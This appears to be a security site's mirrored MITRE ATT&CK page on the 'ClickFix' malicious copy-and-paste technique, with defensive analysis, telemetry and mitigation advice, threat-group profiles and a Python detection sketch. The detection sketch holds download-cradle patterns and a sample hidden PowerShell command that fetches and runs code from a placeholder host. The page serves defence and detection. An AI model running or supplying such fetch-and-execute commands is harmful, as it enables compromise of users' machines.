T1204.004: Malicious Copy and Paste
An adversary may rely upon a user copying and pasting code in order to gain execution. Users may be subjected to social engineering to get them to copy and paste code directly into a Command and Scripting Interpreter. One such strategy is "ClickFix," in which adversaries present users with seemingly helpful solutions—such as prompts to fix errors or complete CAPTCHAs—that instead instruct the user to copy and paste malicious code.
Malicious websites, such as those used in Drive-by Compromise, may present fake error messages or CAPTCHA prompts that instruct users to open a terminal or the Windows Run Dialog box and execute an arbitrary command. These commands may be obfuscated using encoding or other techniques to conceal malicious intent. Once executed, the adversary will typically be able to establish a foothold on the victim's machine.[1][2][3][4]
Adversaries may also leverage phishing emails for this purpose. When a user attempts to open an attachment, they may be presented with a fake error and offered a malicious command to paste as a solution, consistent with the "ClickFix" strategy.[5][6]
Tricking a user into executing a command themselves may help to bypass email filtering, browser sandboxing, or other mitigations designed to protect users against malicious downloaded files.
Analyst context for executives and security teams
Malicious Copy and Paste matters because it shifts execution from a downloaded file to a user-pasted command. That can reduce the value of controls focused only on attachments or browser downloads: the user is socially engineered through fake errors, CAPTCHA prompts, or phishing content into launching a command interpreter themselves.
Executive priority
Treat this as an execution-risk control gap test, not just a user-awareness issue. Leaders should ask whether web filtering, email defenses, endpoint execution prevention, and SOC monitoring can connect the full path from browser or email interaction to shell execution on Windows, macOS, and Linux. The business risk is an initial foothold created through ordinary user action that may bypass file-centric prevention and complicate incident triage.
Technical view
For SOC, detection engineering, and IR teams, validate coverage for browser/email-to-shell behavior involving command and scripting interpreters, especially suspicious or obfuscated one-line commands. ATT&CK provides no official detection text for this sub-technique, but the supplied relationship to DET0340 points to a strategy focused on browser/email leading to shell execution with obfuscated one-liners. Tune detections around parent/ancestor process context, command-line content, interpreter invocation, and follow-on network or payload activity rather than the pasted text alone.
Likely telemetry
- Endpoint process creation events with parent and ancestor process context
- Command-line and script execution logs for command and scripting interpreters
- Windows Run Dialog or terminal launch evidence where available
- Browser, web proxy, URL filtering, and DNS logs tied to suspicious prompt pages
- Email security and attachment interaction logs for phishing-delivered fake errors
Detection direction
- Validate DET0340-style analytics for browser or email clients spawning shells, terminals, or scripting interpreters.
- Prioritize command-line visibility; without it, obfuscation and encoded commands are much harder to assess.
- Correlate web or email interaction shortly before shell execution to reduce noise from legitimate administrator or developer activity.
- Expect false positives from IT support, developers, and power users who routinely paste commands; tune with user role, device type, destination, and command characteristics.
- Do not rely only on malicious file detection, because the technique is specifically useful when no attachment or downloaded executable is required.
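As an added illustration of the detection direction above (not part of the ATT&CK object or the Glexia analysis), the following toy scoring pass runs over constructed process-creation events in a Sysmon-like shape; the field names, parent/interpreter lists, role tuning and `example.invalid` URLs are all assumptions, and the logic simply weights interpreter lineage from a browser, mail client or explorer.exe (the Run dialog host) together with command-line traits of pasted one-liners:

```python
import re

# Constructed toy events in a Sysmon-like shape; field names are assumptions.
LURE_PARENTS = {"chrome.exe", "msedge.exe", "firefox.exe", "outlook.exe", "explorer.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
# Command-line traits common in pasted one-liners; each match adds one point.
OBFUSCATION_HINTS = {
    "encoded command": re.compile(r"-enc(odedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "hidden window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "download cradle": re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b", re.I),
    "dynamic invocation": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "remote resource in argument": re.compile(r"https?://", re.I),
}
POWER_USER_ROLES = {"helpdesk", "developer"}  # roles that legitimately paste commands

SAMPLE_EVENTS = [  # constructed, not real telemetry; example.invalid is a placeholder host
    {"id": 1, "parent": "explorer.exe", "image": "powershell.exe", "user_role": "staff",
     "cmdline": 'powershell -w hidden -c "iex (iwr http://example.invalid/x)"'},
    {"id": 2, "parent": "explorer.exe", "image": "powershell.exe", "user_role": "helpdesk",
     "cmdline": "powershell -NoProfile Get-Service"},
    {"id": 3, "parent": "msedge.exe", "image": "mshta.exe", "user_role": "staff",
     "cmdline": "mshta https://example.invalid/verify"},
    {"id": 4, "parent": "code.exe", "image": "cmd.exe", "user_role": "developer",
     "cmdline": "cmd /c npm test"},
]


def score_event(ev):
    """Score one process-creation event; returns (score, reasons)."""
    if ev["image"].lower() not in INTERPRETERS:
        return 0, []
    score, reasons = 0, []
    # Lineage first: explorer.exe hosts the Run dialog; browsers and mail clients carry the lure.
    if ev["parent"].lower() in LURE_PARENTS:
        score += 2
        reasons.append(f"{ev['image']} spawned by {ev['parent']}")
    for name, pat in OBFUSCATION_HINTS.items():
        if pat.search(ev["cmdline"]):
            score += 1
            reasons.append(name)
    # Tuning: power users paste commands routinely, so demand more command-line evidence from them.
    if ev["user_role"] in POWER_USER_ROLES:
        score -= 1
    return score, reasons


def detect(events, threshold=3):
    """Return {event id: reasons} for events at or above the alert threshold."""
    hits = {}
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits[ev["id"]] = reasons
    return hits
```

In this constructed set only events 1 and 3 cross the threshold; the helpdesk Get-Service call and the developer's npm run stay below it, which is the noise-reduction behaviour the bullets above describe.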
Mitigation priorities
- Start with M1021 Restrict Web-Based Content: reduce access to malicious prompt pages through URL filtering, script controls, download restrictions, and browser policy controls where applicable.
- Apply M1038 Execution Prevention so unauthorized scripts, commands, and untrusted code paths are constrained even when a user initiates them.
- Use M1031 Network Intrusion Prevention at boundaries to block known malicious traffic patterns where signatures are available.
- Use incident response findings to identify where email, browser, endpoint, and network controls failed to break the chain from lure to interpreter execution.
Analyst notes and limits
This is a sub-technique of User Execution and is mapped to the execution tactic across Linux, macOS, and Windows. ATT&CK relationships also show use by MuddyWater, Kimsuky, Contagious Interview, and Havoc; that should inform threat modeling, not be treated as proof of local exposure or active targeting.
Official ATT&CK detection guidance is not provided for this object. Defensive value depends on local logging depth, especially command-line capture and process lineage. The supplied data supports general control and telemetry priorities, but not vendor-specific detections, guaranteed coverage, or claims of active exploitation in any environment.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Related techniques
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1204 | User Execution | This object is a sub-technique of User Execution. |
Groups, software, and campaigns
G0069: MuddyWater
MuddyWater is a cyber espionage group assessed to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS).[1] Since at least 2017, MuddyWater has targeted a range of government and private organizations across sectors, including telecommunications, local government, finance, defense, and oil and natural gas organizations, in the Middle East (specifically the UAE and Saudi Arabia), Asia, Africa, Europe, and North America. MuddyWater has reused domains dating back to October 2025, and has a preference for NameCheap and Hosterdaddy Private Limited (AS136557). In late 2025 and early 2026, MuddyWater used commercial satellite internet (i.e., Starlink) for command and control (C2) communication. [2][3][4][5][6][7][8][9][10][11][12][13]
G0094: Kimsuky
Kimsuky is a Democratic People's Republic of Korea (DPRK)-based cyber espionage group that has been active since at least 2012. The group initially targeted South Korean government agencies, think tanks, and subject-matter experts in various fields. Its operations expanded to include the United Nations and organizations in the government, education, business services, and manufacturing sectors across the United States, Japan, Russia, and Europe. Kimsuky has focused collection on foreign policy and national security issues tied to the Korean Peninsula, nuclear policy, and sanctions. Kimsuky operations have overlapped with those of other North Korean state-sponsored cyber espionage actors as a result of ad hoc collaborations or other limited resource sharing.[1][2][3][4][5][6]
Kimsuky was assessed to be responsible for the 2014 Korea Hydro & Nuclear Power Co. compromise; other notable campaigns include Operation STOLEN PENCIL (2018), Operation Kabar Cobra (2019), and Operation Smoke Screen (2019).[7][8][9] In 2023, Kimsuky was observed using commercial large language models (LLMs) to assist with vulnerability research, scripting, social engineering and reconnaissance.[10]
DPRK threat actor cluster boundaries overlap in open source reporting, with some security researchers consolidating all attributed North Korean state-sponsored cyber activity under Lazarus Group, rather than tracking operationally distinct subgroups.
G1052: Contagious Interview
Contagious Interview is a North Korea–aligned threat group active since 2023. The group conducts both cyberespionage and financially motivated operations, including the theft of cryptocurrency and user credentials. Contagious Interview targets Windows, Linux, and macOS systems, with a particular focus on individuals engaged in software development and cryptocurrency-related activities. [1][2][3][4][5][6][7][8]
S1229: Havoc
Havoc is an open-source post-exploitation command and control (C2) framework first released on GitHub in October 2022 by C5pider (Paul Ungur), who continues to maintain and develop it with community contributors. Havoc provides a wide range of offensive security capabilities and has been adopted by multiple threat actors to establish and maintain control over compromised systems.
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see ATT&CK resources — Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.1 | | Current bundle | e8525fb91f35… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
[1] CloudSEK TRIAD. (2024, September 19). Unmasking the Danger: Lumma Stealer Malware Exploits Fake CAPTCHA Pages. Retrieved March 18, 2025.
[2] Amaury G., Coline Chavane, Felix Aimé and Sekoia TDR. (2025, March 31). From Contagious to ClickFake Interview: Lazarus leveraging the ClickFix tactic. Retrieved April 1, 2025.
[3] Alex Capraro. (2024, December 17). Using CAPTCHA for Compromise: Hackers Flip the Script. Retrieved March 18, 2025.
[4] AhnLab SEcurity intelligence Center. (2025, January 8). Infostealer LummaC2 Spreading Through Fake CAPTCHA Verification Page. Retrieved April 23, 2025.
[5] Tommy Madjar, Selena Larson and The Proofpoint Threat Research Team. (2024, November 18). Security Brief: ClickFix Social Engineering Technique Floods Threat Landscape. Retrieved March 18, 2025.
[6] AhnLab SEcurity intelligence Center. (2024, May 23). Warning Against Phishing Emails Prompting Execution of Commands via Paste (CTRL+V). Retrieved April 23, 2025.
[7] mitre-attack. T1204.004: Malicious Copy and Paste.
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.